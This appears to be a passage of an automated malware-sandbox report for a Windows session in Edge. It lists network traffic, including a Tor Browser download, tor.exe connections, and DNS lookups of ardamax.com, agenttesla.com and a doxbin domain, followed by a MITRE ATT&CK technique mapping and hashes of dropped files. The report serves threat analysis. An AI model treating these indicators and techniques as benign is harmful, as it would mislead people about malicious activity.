GET https://www.torproject.org/static/images/tor-browser-mobile-window/png/TBA10.0.png?h=727fc609

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/android.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/instagram.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/download/svg/stay-safe.svg?h=f11bdbfa

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-speak.svg?h=abdc7268

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/favicon/favicon.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/favicon/favicon.ico

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

tls, http

msedge.exe

6.1kB
133.7kB
69
107

HTTP Request

GET https://www.torproject.org/static/js/modernizr.js?h=9a7f0609

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/SourceCodePro/SourceCodePro-Regular.ttf

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/tor-logo@2x.png?h=16ad42bc

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/download/svg/get-connected.svg?h=5e2656db

tls, http

msedge.exe

10.1kB
285.5kB
118
214

HTTP Request

GET https://www.torproject.org/static/js/bootstrap.bundle.min.js?h=46d1f82f

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/webfonts/fa-brands-400.woff2

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/x-dark.png?h=353e04cc

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/download/png/stay-safe@3x.png?h=f11bdbfa

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/linux.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/mastodon.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/download/svg/get-connected.svg?h=5e2656db

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/yec/illo-yec-browse.svg?h=86d8fd2b

tls, http

msedge.exe

3.2kB
17.9kB
18
20

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/signature.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/linkedin.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-browse.svg?h=86d8fd2b

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

tls, http

msedge.exe

3.9kB
16.6kB
19
20

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/facebook.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/github.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-search.svg?h=347ed4b2

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

HTTP Response

206
204.8.99.144:443

https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

tls, http

msedge.exe

3.1kB
30.6kB
28
27

HTTP Request

GET https://www.torproject.org/thank-you/

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

tls, http

msedge.exe

2.9kB
19.9kB
22
19

HTTP Request

GET https://www.torproject.org/dist/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe

HTTP Response

302

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

HTTP Response

200
172.165.69.228:443

https://nav.smartscreen.microsoft.com/api/browser/edge/download/2

tls, http

msedge.exe

5.6kB
11.6kB
18
18

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/download/2

HTTP Response

200
204.8.99.144:443

https://dist.torproject.org/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe

tls, http

msedge.exe

4.8MB
126.3MB
73317
90435

HTTP Request

GET https://dist.torproject.org/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/arrow-down.png

tls, http

msedge.exe

3.2kB
55.1kB
30
46

HTTP Request

GET https://www.torproject.org/static/images/circle-pattern.png?h=9a4040e4

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/arrow-down.png

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/circle-pattern.svg?h=9a4040e4

tls, http

msedge.exe

3.1kB
56.9kB
30
47

HTTP Request

GET https://www.torproject.org/static/fonts/SourceSerifPro/SourceSerifPro-Regular.ttf

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/circle-pattern.svg?h=9a4040e4

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/hands-helping.png

tls, http

msedge.exe

3.4kB
22.9kB
21
27

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/paper-plane.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/cube.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/hands-helping.png

HTTP Response

200
204.8.99.144:443

www.torproject.org

tls

msedge.exe

959 B
695 B
8
8
204.8.99.144:443

www.torproject.org

tls

msedge.exe

1.1kB
4.9kB
10
13
204.8.99.144:443

www.torproject.org

tls

msedge.exe

959 B
695 B
8
8
127.0.0.1:52565

firefox.exe
127.0.0.1:9151

firefox.exe
127.0.0.1:52689

tor.exe
127.0.0.1:52806

tor.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
84.19.176.161:443

www.hl2jszki3gnbha3mgv2.com

tls

tor.exe

35.4kB
798.8kB
198
590
38.154.255.116:5555

www.xojsfvr6nzm4g.com

tls

tor.exe

2.3MB
20.5MB
6167
16249
185.241.208.239:9000

www.wglxl33vex.com

tls

tor.exe

1.2MB
8.4MB
3325
6879
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe
127.0.0.1:9150

firefox.exe

8.8.8.8:53

www.ardamax.com

dns

msedge.exe

1.4kB
2.7kB
20
17

DNS Request

www.ardamax.com

DNS Response

172.234.222.138

172.234.222.143

DNS Request

ctldl.windowsupdate.com

DNS Response

199.232.210.172

199.232.214.172

DNS Request

ocsp.digicert.com

DNS Response

192.229.221.95

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

oneocsp.microsoft.com

DNS Response

204.79.197.203

DNS Request

174.179.52.72.in-addr.arpa

DNS Request

partner.googleadservices.com

DNS Response

142.250.179.226

DNS Request

226.179.250.142.in-addr.arpa

DNS Request

227.16.217.172.in-addr.arpa

DNS Request

self.events.data.microsoft.com

DNS Response

52.168.112.67

DNS Request

nav.smartscreen.microsoft.com

DNS Response

51.140.244.186

DNS Request

roaming.officeapps.live.com

DNS Response

52.109.76.243

DNS Request

243.76.109.52.in-addr.arpa

DNS Request

metadata.templates.cdn.office.net

DNS Response

92.123.26.217

92.123.26.202

DNS Request

235.137.73.23.in-addr.arpa

DNS Request

188.108.11.51.in-addr.arpa

DNS Request

nav.smartscreen.microsoft.com

DNS Request

nav.smartscreen.microsoft.com

DNS Request

nav.smartscreen.microsoft.com

DNS Request

nav.smartscreen.microsoft.com

DNS Response

51.11.108.188
8.8.8.8:53

20.160.190.20.in-addr.arpa

dns

538 B
905 B
8
8

DNS Request

20.160.190.20.in-addr.arpa

DNS Request

ww7.ardamax.com

DNS Response

199.59.243.227

DNS Request

228.16.217.172.in-addr.arpa

DNS Request

www.google.com

DNS Response

172.217.16.228

DNS Request

3.178.250.142.in-addr.arpa

DNS Request

13.227.111.52.in-addr.arpa

DNS Request

www.agenttesla.com

DNS Request

www.agenttesla.com

DNS Response

154.197.79.12

DNS Response

154.197.79.12
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

1.2kB
2.2kB
17
14

DNS Request

172.210.232.199.in-addr.arpa

DNS Request

nav.smartscreen.microsoft.com

DNS Response

51.140.244.186

DNS Request

95.221.229.192.in-addr.arpa

DNS Request

syndicatedsearch.goog

DNS Response

216.58.201.110

DNS Request

www.gstatic.com

DNS Response

142.250.178.3

DNS Request

fonts.gstatic.com

DNS Response

172.217.16.227

DNS Request

ctldl.windowsupdate.com

DNS Response

199.232.210.172

199.232.214.172

DNS Request

config.edge.skype.com

DNS Response

13.107.42.16

DNS Request

officeclient.microsoft.com

DNS Response

52.109.32.97

DNS Request

97.32.109.52.in-addr.arpa

DNS Request

23.173.189.20.in-addr.arpa

DNS Request

217.26.123.92.in-addr.arpa

DNS Request

nav.smartscreen.microsoft.com

DNS Response

51.11.108.188

DNS Request

config.edge.skype.com

DNS Request

config.edge.skype.com

DNS Request

config.edge.skype.com

DNS Request

config.edge.skype.com

DNS Response

13.107.42.16
172.217.16.228:443

www.google.com

https

msedge.exe

5.8kB
22.4kB
19
23
172.217.16.228:443

www.google.com

https

msedge.exe

9.5kB
76.3kB
48
76
224.0.0.251:5353

2.3kB
37
216.58.201.110:443

syndicatedsearch.goog

https

msedge.exe

4.6kB
9.3kB
11
12
8.8.8.8:53

www.google.com

dns

msedge.exe

352 B
480 B
6
6

DNS Request

www.google.com

DNS Response

172.217.16.228

DNS Request

www.google.com

DNS Response

172.217.16.228

DNS Request

www.gstatic.com

DNS Response

142.250.178.3

DNS Request

fonts.gstatic.com

DNS Response

172.217.16.227

DNS Request

host.com

DNS Request

host.com

DNS Response

104.21.31.241

172.67.180.245

DNS Response

104.21.31.241

172.67.180.245
172.217.16.228:443

www.google.com

https

msedge.exe

7.1kB
80.0kB
42
67
216.58.201.110:443

syndicatedsearch.goog

https

msedge.exe

4.7kB
9.0kB
15
14
142.250.179.226:443

partner.googleadservices.com

https

msedge.exe

3.9kB
6.6kB
11
9
172.217.16.228:443

www.google.com

https

msedge.exe

6.9kB
42.5kB
30
46
8.8.8.8:53

241.31.21.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

241.31.21.104.in-addr.arpa

DNS Request

241.31.21.104.in-addr.arpa
8.8.8.8:53

th.bing.com

dns

msedge.exe

114 B
636 B
2
2

DNS Request

th.bing.com

DNS Request

th.bing.com

DNS Response

88.221.135.3

88.221.135.17

88.221.135.16

88.221.135.18

88.221.135.1

88.221.135.0

88.221.135.19

88.221.135.2

88.221.135.24

DNS Response

88.221.135.50

88.221.135.32

88.221.135.43

88.221.135.48

88.221.135.34

88.221.135.41

88.221.135.51

88.221.135.27

88.221.135.35
8.8.8.8:53

3.135.221.88.in-addr.arpa

dns

191 B
818 B
3
3

DNS Request

3.135.221.88.in-addr.arpa

DNS Request

login.live.com

DNS Request

login.live.com

DNS Response

20.190.160.14

40.126.32.133

40.126.32.136

40.126.32.134

40.126.32.72

40.126.32.76

20.190.160.22

20.190.160.17

DNS Response

20.190.160.22

20.190.160.14

40.126.32.72

40.126.32.140

40.126.32.74

40.126.32.138

40.126.32.68

40.126.32.136
23.73.138.225:443

t.ssl.ak.dynamic.tiles.virtualearth.net

https

msedge.exe

8.7kB
326.1kB
91
276
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

293 B
836 B
4
4

DNS Request

237.197.79.204.in-addr.arpa

DNS Request

dev.virtualearth.net

DNS Response

13.107.246.64

DNS Request

t.ssl.ak.tiles.virtualearth.net

DNS Request

t.ssl.ak.tiles.virtualearth.net

DNS Response

23.73.138.195

23.73.138.225

DNS Response

23.73.138.225

23.73.138.195
8.8.8.8:53

4.42.215.91.in-addr.arpa

dns

385 B
1.1kB
6
6

DNS Request

4.42.215.91.in-addr.arpa

DNS Request

fonts.googleapis.com

DNS Response

216.58.212.234

DNS Request

cdn.doxbin.net

DNS Response

95.129.232.35

DNS Request

234.212.58.216.in-addr.arpa

DNS Request

www.bing.com

DNS Request

www.bing.com

DNS Response

88.221.135.11

88.221.135.0

88.221.135.1

88.221.135.9

88.221.135.3

88.221.134.251

88.221.135.2

88.221.135.10

88.221.135.16

DNS Response

88.221.135.0

88.221.135.1

88.221.135.11

88.221.134.251

88.221.135.2

88.221.135.16

88.221.135.10

88.221.135.3

88.221.135.9
8.8.8.8:53

r.bing.com

dns

msedge.exe

407 B
956 B
6
6

DNS Request

r.bing.com

DNS Response

95.101.143.219

88.221.135.0

88.221.135.2

88.221.134.249

88.221.134.2

88.221.134.251

95.101.143.212

88.221.135.1

95.101.143.218

DNS Request

233.137.73.23.in-addr.arpa

DNS Request

218.143.101.95.in-addr.arpa

DNS Request

www.torproject.org

DNS Response

204.8.99.144

116.202.120.165

95.216.163.36

204.8.99.146

116.202.120.166

DNS Request

144.99.8.204.in-addr.arpa

DNS Request

144.99.8.204.in-addr.arpa
8.8.8.8:53

th.bing.com

dns

msedge.exe

114 B
636 B
2
2

DNS Request

th.bing.com

DNS Response

95.101.143.218

88.221.134.251

95.101.143.219

88.221.134.2

88.221.135.2

88.221.135.3

88.221.135.1

88.221.134.249

88.221.135.0

DNS Request

th.bing.com

DNS Response

95.101.143.218

88.221.134.251

88.221.135.2

88.221.135.0

95.101.143.219

88.221.134.249

88.221.135.1

88.221.135.3

88.221.134.2
8.8.8.8:53

nav.smartscreen.microsoft.com

dns

msedge.exe

345 B
774 B
5
5

DNS Request

nav.smartscreen.microsoft.com

DNS Response

172.165.69.228

DNS Request

dist.torproject.org

DNS Response

204.8.99.144

116.202.120.165

116.202.120.166

204.8.99.146

DNS Request

228.69.165.172.in-addr.arpa

DNS Request

cacerts.digicert.com

DNS Request

cacerts.digicert.com

DNS Response

192.229.221.95

DNS Response

192.229.221.95
8.8.8.8:53

161.176.19.84.in-addr.arpa

dns

144 B
216 B
2
2

DNS Request

161.176.19.84.in-addr.arpa

DNS Request

161.176.19.84.in-addr.arpa
8.8.8.8:53

116.255.154.38.in-addr.arpa

dns

146 B
264 B
2
2

DNS Request

116.255.154.38.in-addr.arpa

DNS Request

116.255.154.38.in-addr.arpa
8.8.8.8:53

239.208.241.185.in-addr.arpa

dns

148 B
262 B
2
2

DNS Request

239.208.241.185.in-addr.arpa

DNS Request

239.208.241.185.in-addr.arpa
8.8.8.8:53

aefd.nelreports.net

dns

msedge.exe

130 B
348 B
2
2

DNS Request

aefd.nelreports.net

DNS Request

aefd.nelreports.net

DNS Response

23.73.137.233

23.73.138.209

DNS Response

23.73.138.209

23.73.137.233
23.73.137.233:443

aefd.nelreports.net

https

msedge.exe

3.0kB
6.6kB
23
25
8.8.8.8:53

aefd.nelreports.net

dns

msedge.exe

130 B
348 B
2
2

DNS Request

aefd.nelreports.net

DNS Request

aefd.nelreports.net

DNS Response

23.73.138.209

23.73.137.233

DNS Response

23.73.137.233

23.73.138.209
23.73.138.209:443

aefd.nelreports.net

https

msedge.exe

2.9kB
3.7kB
20
23
8.8.8.8:53

209.138.73.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

209.138.73.23.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C389FD106AACA95B265CC81A85B3522B_CF05D07E0A14517C71ACBA97497C0E4E

Filesize
1KB

MD5
4c9be3df8203bf204a05b101cb324840

SHA1
948d4b0c9ae2e54528a65d802e9fc341d67ce1b4

SHA256
b01f63544b4702a5a4b5f41cc0d616441e4cab4ada5621d886d63f58f6f84cdf

SHA512
b3fab5d1e985f283dce7573b2a316428f9a52117841cef4d46076ef17202287bbbfcb904cb901eb62ecb60e2fd7d4443c34e844c66efb709d2517888ee48ee70

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
471B

MD5
caef077d66c221893087d1ad349e5d62

SHA1
3ebe231961d42cab59d964e8e6d3dd6e4661f488

SHA256
efe74e079611353dd865f323bd3cda14dd9862c7a3b9099b1bc47012aabee255

SHA512
75797f3b950ee7c5aea5556b672f3271107e5a7e7fc96741d5fd0fd492eefa9ee355dab99d8e5a116a78a3dc94bab4b38179aff9aee45c15e5958ad7b8caa1f5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C389FD106AACA95B265CC81A85B3522B_CF05D07E0A14517C71ACBA97497C0E4E

Filesize
568B

MD5
4038ab2cfa32b4dec36be3bf729cc926

SHA1
514714fc64ed2d181d423016e57c730059188356

SHA256
eab62bc87bdb5ee3185cc5da57296d62ad67298c946728234198f277a6bc9f1c

SHA512
8edae5f2fce7d7203e0ce5790cb667b60fd57a8d42a20ef3787ed2d3035e1ba7d5421a95157f17a9b5cd18f968a297fa25b9ccd10b309888e18cc8c0580adfc2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
412B

MD5
13795a7d892dbf72a2d21c48c58b9980

SHA1
8e72789c6a59f1f6524cfb8a5c888ed691ef511e

SHA256
6f1e455d26b870516a724eae7485619e20ba7c0e8ecf5bbd407d48ab715a25d1

SHA512
bd7d46d73e0f8352afb8cbde4e63d66eb7ff49f5414947ea8d58bd31e485e57abccb31bda7ba4c47997f60c547cf91f78771f23edf881d8785d9cd7c20c0cbc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\42b75fd0-7d99-4002-87b5-6a0b0a2f2407.tmp

Filesize
10KB

MD5
0e4ea65cd57f33e4a7f315c0f9d6d40e

SHA1
cbf52b4fdace4d241125796ef6fb2ea28fef9452

SHA256
f7c29cbf24d6e824ce811bfb76964093acd4321fae377844939307b1e8f0c340

SHA512
e8ed1a286b7cc9af6c0dbc06b5ff60fdfe1100edd040f39a405a1066fa51b42d3b7215cea0a5ea056a458967dd3b85ceb16ca9511a4272e78064333e7fae5762

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fdc6065dac662634d1932a8666ca3d70

SHA1
7d854ef1d7911137ba6f7053fb5710a8b1fe5b9f

SHA256
c0fac3d65a522db3a998dc1a3fea166bafe9a8d3e31ac1806cb0d5c8d439539e

SHA512
48c2fd5d1186983f04670c91768de855cbe418abf25503923bf8c7e13557b0821dcd389725f07395d8d202a8ca41b5f347e11c33dedd88f689144498c0368541

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7bed1eca5620a49f52232fd55246d09a

SHA1
e429d9d401099a1917a6fb31ab2cf65fcee22030

SHA256
49c484f08c5e22ee6bec6d23681b26b0426ee37b54020f823a2908ab7d0d805e

SHA512
afc8f0b5b95d593f863ad32186d1af4ca333710bcfba86416800e79528616e7b15f8813a20c2cfa9d13688c151bf8c85db454a9eb5c956d6e49db84b4b222ee8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5eaa3ac5d3d9716cda236a136f99cbf5

SHA1
beceb22eee061cb12441e22710efca1e57c776b5

SHA256
34ce3bbe59af9db2c4d9eec4db806860d0b849e4bc118274c6d2de64ed9a7363

SHA512
cef387e26d0607b2b8cf57fcbc5c39a7ab0ad7e9046d778f9280a43318fc2637b80dd8f45d90d17c57c717837e28c8cd802abe800d37d702071aa2ed96a81862

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5431d6602455a6db6e087223dd47f600

SHA1
27255756dfecd4e0afe4f1185e7708a3d07dea6e

SHA256
